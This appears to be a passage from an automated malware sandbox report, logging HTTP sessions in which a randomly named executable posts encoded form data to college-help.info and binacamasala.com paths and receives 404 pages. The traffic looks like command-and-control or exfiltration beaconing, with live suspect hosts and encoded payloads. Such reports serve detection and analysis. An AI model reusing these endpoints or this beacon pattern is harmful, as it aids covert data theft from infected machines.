                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
                                                                                                                            Nov 7, 2024 10:50:26.438641071 CET185INData Raw: 70 78 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 29 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 20 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 65 61 63 68 62 75 62 62 6c 65 22 3e 3c 73 70 61 6e 3e 34
                                                                                                                            Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            4192.168.2.224916538.88.82.5680652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:50:28.275607109 CET2472OUTPOST /fu91/ HTTP/1.1
                                                                                                                            Host: www.college-help.info
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.college-help.info
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 3627
                                                                                                                            Referer: http://www.college-help.info/fu91/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 4b 58 62 46 59 64 78 42 76 41 48 48 4f 73 32 67 76 33 36 4b 6e 72 49 4d 30 30 47 35 69 4a 6e 79 59 4f 51 56 42 6d 51 74 67 4b 51 55 56 61 6a 71 64 79 79 35 65 35 32 44 4a 37 5a 46 73 7a 6a 77 75 6a 61 79 4c 61 6d 65 73 61 6d 68 57 53 66 31 4e 36 75 49 46 68 41 6a 72 4e 74 54 30 79 76 70 45 72 65 6b 70 7a 7a 6c 54 44 72 6b 56 47 66 5a 4d 77 53 69 38 6e 77 37 4f 6d 73 4a 65 44 54 38 4a 61 65 2f 47 6b 42 77 57 35 6d 38 50 57 73 2b 48 70 33 34 6a 43 59 53 43 4b 47 35 65 48 56 48 68 30 54 4e 48 46 6d 50 78 36 4d 54 48 76 2f 7a 71 2f 48 2f 79 4f 4b 54 55 36 37 57 4b 7a 43 52 48 43 32 78 4b 73 58 48 66 4d 4c 6b 6f 76 4e 71 66 53 42 71 55 50 6a 76 51 43 48 2f 71 67 34 46 75 69 51 62 4e 51 6d 6c 6c 38 31 35 54 6a 43 76 56 34 54 78 74 42 49 47 35 6a 47 4e 2f 42 6e 37 69 79 5a 66 66 62 66 48 76 6f 74 65 68 34 6d 78 59 42 44 39 56 52 64 30 2f 6d 32 69 6d 62 6e 52 69 36 74 72 75 31 73 5a 4f 2f 5a 6c 50 31 5a 69 39 72 32 4d 34 34 4c 68 48 69 76 77 66 79 74 39 6f 35 65 4d 54 5a 4e 6e 35 62 49 [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=KXbFYdxBvAHHOs2gv36KnrIM00G5iJnyYOQVBmQtgKQUVajqdyy5e52DJ7ZFszjwujayLamesamhWSf1N6uIFhAjrNtT0yvpErekpzzlTDrkVGfZMwSi8nw7OmsJeDT8Jae/GkBwW5m8PWs+Hp34jCYSCKG5eHVHh0TNHFmPx6MTHv/zq/H/yOKTU67WKzCRHC2xKsXHfMLkovNqfSBqUPjvQCH/qg4FuiQbNQmll815TjCvV4TxtBIG5jGN/Bn7iyZffbfHvoteh4mxYBD9VRd0/m2imbnRi6tru1sZO/ZlP1Zi9r2M44LhHivwfyt9o5eMTZNn5bIgcvBIqiHh3PSt78gWpY/cnP8RHNz4eKeqmILZi5BcQtweV+VtAAsWWUI6zTQy/jSmTe2mN/4/CdPNvC/DJpNf/f7LrJBpjTGV5Wx+zJ6esIzaYe6I+r1FDtkOUPPV44PyM1xkg8xYfCrlMIOqYJB3BWtjB8J8t5AP9V/wTH7ruL7+T/4f8/SPe8QUzCZbekRbT8JBaAu1WTzvr73AiZnlQmqF2XkYhbyeVXCPAUWaRna2SCuSRHcVCfo9bIFOBdQ0XQ/n48hYcElxOi2FzWpqCvgnf/ucPTZ97rbKOjAww9OPkWDUZmyMvlwamQZF/zWG7wBNzXv7eceUP1Ca+hw4MhdrVmcAq6Ypk/mtzjNenpyn/Tur1eOlRNpFxwtGWTVmr8T5UhHQyE6ecX3Ad8c1QWmIm9DYQ9/rk4FIBd5fHcWoPObvZRtTzMBH7BT+lI46i+Po63ULk2TOf059k4ijz7ywoBSLBeB73BnuB70WN7xVC3/EL2I5C9DXzaeyiG44ldrj4UVtVaM+Uw1pqPFP4ziBEwVh3VXcmynfZD3q/a4w53Ebk000zKA4CovIJA0r3VCDaHrJxniMmWMpZ1Hbt54dUw++JLOn7fjhSbIHiJbU7E5Zq6b94/oAC5JsmNoyk6hezWaQ7T0Ik2lzvlf88Dj3xeWczagxX [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:50:28.280725956 CET1758OUTData Raw: 55 6d 56 30 57 66 69 70 48 4f 42 30 5a 77 4c 65 68 67 36 49 33 47 6a 6f 4b 77 73 41 37 65 38 4b 31 55 7a 62 31 6e 32 53 48 66 55 6a 45 46 4a 4e 58 2b 4a 34 45 69 45 72 78 69 46 4c 65 4e 63 76 69 59 4a 55 36 32 42 75 68 35 4c 6a 32 36 71 6b 49 74
                                                                                                                            Data Ascii: UmV0WfipHOB0ZwLehg6I3GjoKwsA7e8K1Uzb1n2SHfUjEFJNX+J4EiErxiFLeNcviYJU62Buh5Lj26qkIt4mHkyVPdVWT7Ifa/gqHB83OjGJlYVwnmB8aJ9jZj+de27ZC1gih2s+axQ7ga7/JSfQ2sEmyyTFqvjtWBvcc0ebPDv7ce/QDxtgxlvcXPyHHp8VjUah9SbXqdDQ208GLtvjHkaDQ3FRQTv9rycU/Dv2D+IFI/HN9FG
                                                                                                                            Nov 7, 2024 10:50:28.966834068 CET1236INHTTP/1.1 404 Not Found
                                                                                                                            Date: Thu, 07 Nov 2024 09:50:28 GMT
                                                                                                                            Server: Apache
                                                                                                                            Last-Modified: Wed, 06 Nov 2024 18:10:13 GMT
                                                                                                                            ETag: "49d-626426de29b28"
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 1181
                                                                                                                            Content-Type: text/html
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
                                                                                                                            Nov 7, 2024 10:50:28.966856003 CET185INData Raw: 70 78 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 29 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 20 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 65 61 63 68 62 75 62 62 6c 65 22 3e 3c 73 70 61 6e 3e 34
                                                                                                                            Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            5192.168.2.224916638.88.82.5680652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:50:30.815200090 CET535OUTGET /fu91/?mFptYb=HVzlbrdNsUKwRMyAkWW6+eYcwGansP/WUf8DIHIYxdtxD6ajZVqGQ6r7bYdvsg7HhzGwO4nUubyDeivvZ5uUZnZTjM5UwBrFB6CCixihWT7Na0ffLjed1FEIbDhA&Vta=nFypuDtholF HTTP/1.1
                                                                                                                            Host: www.college-help.info
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Nov 7, 2024 10:50:31.693883896 CET1236INHTTP/1.1 404 Not Found
                                                                                                                            Date: Thu, 07 Nov 2024 09:50:31 GMT
                                                                                                                            Server: Apache
                                                                                                                            Last-Modified: Wed, 06 Nov 2024 18:10:13 GMT
                                                                                                                            ETag: "49d-626426de29b28"
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 1181
                                                                                                                            Content-Type: text/html
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
                                                                                                                            Nov 7, 2024 10:50:31.693917990 CET185INData Raw: 70 78 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 29 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 20 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 65 61 63 68 62 75 62 62 6c 65 22 3e 3c 73 70 61 6e 3e 34
                                                                                                                            Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>
                                                                                                                            Nov 7, 2024 10:50:31.694031000 CET185INData Raw: 70 78 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 29 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 20 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 65 61 63 68 62 75 62 62 6c 65 22 3e 3c 73 70 61 6e 3e 34
                                                                                                                            Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            6192.168.2.224916715.197.148.3380652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:50:36.732366085 CET2472OUTPOST /usv6/ HTTP/1.1
                                                                                                                            Host: www.binacamasala.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.binacamasala.com
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 2163
                                                                                                                            Referer: http://www.binacamasala.com/usv6/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 65 69 72 75 41 33 31 33 64 63 77 47 31 59 48 55 41 6e 2b 36 78 62 6d 4e 47 34 35 36 6f 7a 76 55 4a 78 74 78 76 66 72 50 66 69 63 59 49 58 6e 43 32 68 41 78 31 4d 37 38 76 48 37 44 41 65 79 2f 57 43 78 6f 37 44 72 36 6d 36 6d 79 4e 48 46 36 78 74 68 77 77 37 63 2f 30 58 70 54 6f 53 32 48 72 67 4f 72 52 61 45 62 78 67 49 4f 32 6e 4a 75 39 38 53 56 2b 56 4b 66 67 53 66 2b 6c 2f 55 67 52 30 41 2b 73 74 75 56 66 4b 76 66 6f 45 4c 61 52 4d 36 6d 65 2f 66 73 33 2b 41 4b 61 69 4a 59 46 53 6b 70 66 48 79 42 74 30 4e 58 37 4f 4a 74 68 4b 36 47 38 4d 6f 7a 6b 6b 54 6e 33 59 76 42 45 36 62 46 57 54 77 54 62 34 2f 65 44 30 5a 52 65 4f 43 7a 71 77 30 46 2f 4f 31 5a 72 45 31 65 34 6e 4a 6d 5a 79 53 4e 43 4e 33 4b 4a 38 51 77 61 4a 6c 48 39 73 50 48 77 39 73 6e 63 7a 32 74 62 57 4b 62 2f 72 75 39 4f 75 51 67 59 6b 59 35 69 75 46 51 68 5a 72 66 66 6e 51 44 58 6a 4e 57 6d 42 64 2b 47 45 50 42 6e 58 6e 63 67 53 76 4c 32 4f 45 33 35 58 79 73 51 71 61 66 65 6f 36 56 73 69 56 4a 53 66 33 55 31 67 45 [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=eiruA313dcwG1YHUAn+6xbmNG456ozvUJxtxvfrPficYIXnC2hAx1M78vH7DAey/WCxo7Dr6m6myNHF6xthww7c/0XpToS2HrgOrRaEbxgIO2nJu98SV+VKfgSf+l/UgR0A+stuVfKvfoELaRM6me/fs3+AKaiJYFSkpfHyBt0NX7OJthK6G8MozkkTn3YvBE6bFWTwTb4/eD0ZReOCzqw0F/O1ZrE1e4nJmZySNCN3KJ8QwaJlH9sPHw9sncz2tbWKb/ru9OuQgYkY5iuFQhZrffnQDXjNWmBd+GEPBnXncgSvL2OE35XysQqafeo6VsiVJSf3U1gEdtDBI5xx7BLsVH+o2rUOZYdGl248NggDgL6bj7JNghpbADt0jcdHoVLb1Azo+S0DLClZDy/UtNQH2/zyf0bKXt6BqQhVqJlptTyPc4RXUfP1GvCSldsEOW9t/TAWxI23SXhQjfzO2iHExAlrXXOJG947H/h8CFqqlBsGQxhyZIL08QP8OKArhGKMRdZnWvfTRBEUwBb8d16Hmb1R3sk/tSRTpJyx3nKF3idrcg/QbbT73GwjE4nGIegZr7KLkoRR2mWtw8LP4xwgkUntJpls62SMZefmWOgEGnwXlaOFPGlflZCRpByHCcEKPZiYf9OjY/MTHNBqwKEf/eDdN6WeL7N2M3nwtfdf878O9W72H4tnW6iE1FzS3BqSAEGd2iX56REdbyf7rEUmx5jx8XHpzfWDPT0k5OR/c3+nGurv6saQbufk1V0NLYJG+UQVhply+3Eq9SJue5txcvEQ1A9Moz20x0pr0WGMn+pukHsUqB2ajfSg9g01qBT/6VDozBai0YZCoeDpt53NlS8nO+RcJzB0soD+AchgDDMGLOpf5G7mpPcJsGnLhup8BKuhQUonJsOxM+3ySzbLNMjELaNvl4FcXzvtAwMgWpjMj1zgHymvE8CeoG2uh47fNPFmmmHqHX6H4cy7G2pty5WbNWvtbgx1S8WBCOZmFP [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:50:36.737348080 CET291OUTData Raw: 46 77 75 31 4d 61 35 47 32 41 42 45 49 41 36 6e 30 70 7a 74 7a 70 53 51 31 53 36 49 43 58 35 63 46 44 2b 35 6b 44 76 57 61 2f 69 49 50 59 79 6c 38 6d 35 36 4b 6e 4c 52 50 31 61 4d 57 53 30 43 6e 61 45 68 44 61 72 4b 54 4e 57 57 4d 77 32 42 6e 75
                                                                                                                            Data Ascii: Fwu1Ma5G2ABEIA6n0pztzpSQ1S6ICX5cFD+5kDvWa/iIPYyl8m56KnLRP1aMWS0CnaEhDarKTNWWMw2Bnu5Fx2/6k9efwzrjsCGMIr/6M7+jUUImJ6NZs82N862BDWdlakKECtXfHQmuE51bQ3TP42/JbthyxUVMMHMgluogkyJPfSuOIt61/PB8pF4JLtsVo0G68HudPnoFSjJBvp4dz0yYozbDV4+07TPvIywOcVY57TnJGhD


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            7192.168.2.224916815.197.148.3380652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:50:39.275105000 CET802OUTPOST /usv6/ HTTP/1.1
                                                                                                                            Host: www.binacamasala.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.binacamasala.com
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 203
                                                                                                                            Referer: http://www.binacamasala.com/usv6/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 65 69 72 75 41 33 31 33 64 63 77 47 31 5a 48 55 42 32 2b 36 78 37 6d 4e 42 34 35 36 69 54 76 53 4a 78 78 35 76 65 75 58 66 77 38 59 4a 46 2f 43 32 54 6f 78 30 4d 37 2f 67 6e 37 48 4f 2b 79 71 57 43 78 53 37 47 44 36 6d 37 47 79 4f 68 42 36 33 73 68 7a 74 37 63 39 37 33 70 6f 6f 53 71 6b 72 67 43 37 52 62 73 62 78 6a 63 4f 33 6b 68 75 34 65 4b 56 75 56 4b 5a 6f 79 65 34 6c 2f 4a 6f 52 30 51 6d 73 74 36 56 66 2f 48 66 6f 56 72 61 56 66 43 6d 58 66 66 74 39 65 42 64 56 44 6f 4e 4c 6b 30 2f 62 68 79 38 72 51 59 7a 33 5a 39 44 67 61 72 4b 36 73 6b 49 69 42 65 52 7a 4c 4b 57 48 41 3d 3d
                                                                                                                            Data Ascii: mFptYb=eiruA313dcwG1ZHUB2+6x7mNB456iTvSJxx5veuXfw8YJF/C2Tox0M7/gn7HO+yqWCxS7GD6m7GyOhB63shzt7c973pooSqkrgC7RbsbxjcO3khu4eKVuVKZoye4l/JoR0Qmst6Vf/HfoVraVfCmXfft9eBdVDoNLk0/bhy8rQYz3Z9DgarK6skIiBeRzLKWHA==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            8192.168.2.224916915.197.148.3380652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:50:41.817393064 CET2472OUTPOST /usv6/ HTTP/1.1
                                                                                                                            Host: www.binacamasala.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.binacamasala.com
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 3627
                                                                                                                            Referer: http://www.binacamasala.com/usv6/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 65 69 72 75 41 33 31 33 64 63 77 47 30 34 33 55 4e 78 43 36 67 62 6d 4d 45 34 35 36 6f 7a 76 57 4a 78 74 35 76 66 72 50 66 6d 4d 59 49 57 48 43 32 78 41 78 76 4d 37 2f 6d 6e 37 44 41 65 79 34 57 43 6c 34 37 44 6e 4d 6d 2f 69 79 4e 47 46 36 78 75 5a 77 6d 72 63 2f 73 6e 70 72 6f 53 71 78 72 67 53 2f 52 62 59 68 78 6a 45 4f 33 52 4e 75 39 75 4b 55 77 46 4b 5a 6f 79 65 38 6c 2f 4a 55 52 30 49 49 73 70 76 4b 66 4b 44 66 6f 30 4c 61 47 73 36 6c 63 2f 66 70 68 4f 41 51 61 69 46 6c 46 53 6b 74 66 48 4f 76 74 30 4a 58 36 62 46 74 68 4a 53 48 34 63 6f 30 71 45 54 6e 7a 59 76 44 45 36 62 5a 57 54 77 54 62 34 44 65 43 6b 5a 52 65 4b 57 77 31 67 30 46 68 65 31 75 6c 6b 4a 73 34 6e 74 45 5a 7a 69 37 43 36 76 4b 49 35 38 77 4e 4a 6c 48 78 4d 50 4a 77 39 73 36 57 54 32 78 62 58 6a 75 2f 6f 47 54 4f 75 51 67 59 6e 51 35 75 64 74 51 6a 4a 72 66 51 48 51 43 4d 54 4e 56 6d 42 70 63 47 46 4c 42 6e 57 76 63 67 6c 4c 4c 77 4d 73 6f 79 48 79 74 48 36 61 5a 50 34 36 41 73 68 68 76 53 66 2b 63 31 6a 73 [TRUNCATED]
